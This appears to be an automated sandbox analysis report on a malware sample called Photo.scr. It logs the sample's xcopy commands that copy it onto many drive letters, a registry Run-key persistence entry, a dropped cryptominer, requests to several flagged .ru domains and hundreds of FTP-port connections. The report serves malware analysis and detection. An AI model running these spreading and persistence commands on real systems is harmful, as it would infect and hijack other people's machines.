xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" G:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
4092
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" H:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3792
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" J:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\imm32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\kernelbase.dll
c:\systemroot\system32\ntdll.dll
c:\windows\system32\xcopy.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ulib.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\msctf.dll

PID
3620
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" K:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3200
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" L:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3828
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" M:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\imm32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\kernelbase.dll
c:\systemroot\system32\ntdll.dll
c:\windows\system32\xcopy.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ulib.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\msctf.dll

PID
4008
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" N:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\imm32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\kernelbase.dll
c:\systemroot\system32\ntdll.dll
c:\windows\system32\xcopy.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ulib.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\msctf.dll

PID
3520
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" O:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3356
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" P:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
4000
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" R:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2668
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" S:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2804
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" T:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2324
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" Q:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3560
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" U:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3036
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" Y:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3996
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" I:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2624
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" X:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\imm32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\kernelbase.dll
c:\systemroot\system32\ntdll.dll
c:\windows\system32\xcopy.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ulib.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\msctf.dll

PID
4040
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" V:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3948
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" X:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ulib.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3920
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" W:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll

PID
4532
CMD
xcopy /y "C:\Users\admin\AppData\Local\Temp\Photo.scr" Z:\
Path
C:\Windows\system32\xcopy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4
Version:
Company
Microsoft Corporation
Description
Extended Copy Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

Registry activity

Total events
137
Read events
118
Write events
19
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
2956
Photo.scr
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Photo_RASAPI32
EnableFileTracing
0
2956
Photo.scr
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Photo_RASAPI32
EnableConsoleTracing
0
2956
Photo.scr
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Photo_RASAPI32
FileTracingMask
4294901760
2956
Photo.scr
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Photo_RASAPI32
ConsoleTracingMask
4294901760
2956
Photo.scr
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Photo_RASAPI32
MaxFileSize
1048576
2956
Photo.scr
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Photo_RASAPI32
FileDirectory
%windir%\tracing
2956
Photo.scr
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Photo_RASMANCS
EnableFileTracing
0
2956
Photo.scr
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Photo_RASMANCS
EnableConsoleTracing
0
2956
Photo.scr
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Photo_RASMANCS
FileTracingMask
4294901760
2956
Photo.scr
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Photo_RASMANCS
ConsoleTracingMask
4294901760
2956
Photo.scr
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Photo_RASMANCS
MaxFileSize
1048576
2956
Photo.scr
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Photo_RASMANCS
FileDirectory
%windir%\tracing
2956
Photo.scr
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2956
Photo.scr
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2956
Photo.scr
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2956
Photo.scr
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2156
reg.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Run
C:\Users\admin\AppData\Local\Temp\Photo.scr

Files activity

Executable files
1
Suspicious files
0
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
2956
Photo.scr
C:\Users\admin\AppData\Local\Temp\NsCpuCNMiner32.exe
executable
MD5: 3afeb8e9af02a33ff71bf2f6751cae3a
SHA256: a0eba3fda0d7b22a5d694105ec700df7c7012ddc4ae611c3071ef858e2c69f08
2500
cmd.exe
C:\Users\admin\AppData\Local\Temp\pools.txt
text
MD5: 5fa98810a24f6a74de84eb07f11adf85
SHA256: e53551ba4f85976f5a8a33055469bb55a4961fce6c00435ef2c108666e55f55d
2956
Photo.scr
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\test[1].htm
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
8
TCP/UDP connections
483
DNS requests
9
Threats
1

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
2956 Photo.scr GET 404 37.1.216.8:80 http://hrtests.ru/test.html?1 DE
html
malicious
2956 Photo.scr GET 404 37.1.216.8:80 http://profetest.ru/test.html?2 DE
html
suspicious
2956 Photo.scr GET 404 37.1.216.8:80 http://testpsy.ru/test.html?3 DE
html
suspicious
2956 Photo.scr GET 404 37.1.216.8:80 http://pstests.ru/test.html?4 DE
html
suspicious
2956 Photo.scr GET 404 37.1.216.8:80 http://qptest.ru/test.html?5 DE
html
malicious
2956 Photo.scr GET 404 37.1.216.8:80 http://prtests.ru/test.html?6 DE
html
suspicious
2956 Photo.scr GET 404 37.1.216.8:80 http://jobtests.ru/test.html?7 DE
html
suspicious
2956 Photo.scr GET 200 89.111.178.201:80 http://iqtesti.ru/test.html?8 RU
html
malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
2956 Photo.scr 37.1.216.8:80 Leaseweb Deutschland GmbH DE suspicious
2956 Photo.scr 89.111.178.201:80 CJSC Registrar R01 RU suspicious
2956 Photo.scr 64.58.58.0:21 US unknown
2956 Photo.scr 147.63.135.0:21 US unknown
2956 Photo.scr 21.3.74.0:21 US unknown
2956 Photo.scr 196.172.234.0:21 zain-as GH unknown
2956 Photo.scr 43.136.150.0:21 JP unknown
2956 Photo.scr 20.25.219.0:21 US unknown
2956 Photo.scr 147.141.93.0:21 US unknown
2956 Photo.scr 94.147.101.0:21 Telenor A/S DK unknown
2956 Photo.scr 214.120.210.0:21 DoD Network Information Center US unknown
2956 Photo.scr 92.216.190.0:21 Vodafone GmbH DE unknown
2956 Photo.scr 60.11.246.0:21 CHINA UNICOM China169 Backbone CN unknown
2956 Photo.scr 214.225.163.0:21 DoD Network Information Center US unknown
2956 Photo.scr 80.50.87.0:21 Orange Polska Spolka Akcyjna PL unknown
2956 Photo.scr 114.251.181.0:21 China Unicom Beijing Province Network CN unknown
2956 Photo.scr 146.69.60.0:21 US unknown
2956 Photo.scr 148.235.122.0:21 Uninet S.A. de C.V. MX unknown
2956 Photo.scr 96.127.238.0:21 EBOX CA unknown
2956 Photo.scr 78.38.72.0:21 Information Technology Company (ITC) IR unknown
2956 Photo.scr 180.44.121.0:21 NTT Communications Corporation JP unknown
2956 Photo.scr 200.221.242.0:21 Universo Online S.A. BR unknown
2956 Photo.scr 25.21.73.0:21 GB unknown
2956 Photo.scr 3.140.129.0:21 US unknown
2956 Photo.scr 82.17.239.0:21 Virgin Media Limited GB unknown
2956 Photo.scr 175.33.245.0:21 Microplex PTY LTD AU unknown
2956 Photo.scr 132.46.231.0:21 754th Electronic Systems Group US unknown
2956 Photo.scr 195.239.25.0:21 PVimpelCom RU unknown
2956 Photo.scr 190.240.135.0:21 EPM Telecomunicaciones S.A. E.S.P. CO unknown
2956 Photo.scr 162.0.151.0:21 AirComPlus Inc. CA unknown
2956 Photo.scr 106.54.253.0:21 CN unknown
2956 Photo.scr 132.16.196.0:21 754th Electronic Systems Group US unknown
2956 Photo.scr 112.55.108.0:21 Guangdong Mobile Communication Co.Ltd. CN unknown
2956 Photo.scr 149.219.176.0:21 Westdeutscher Rundfunk Koeln DE unknown
2956 Photo.scr 49.17.46.0:21 Korea Telecom KR unknown
2956 Photo.scr 16.145.36.0:21 Hewlett-Packard Company US unknown
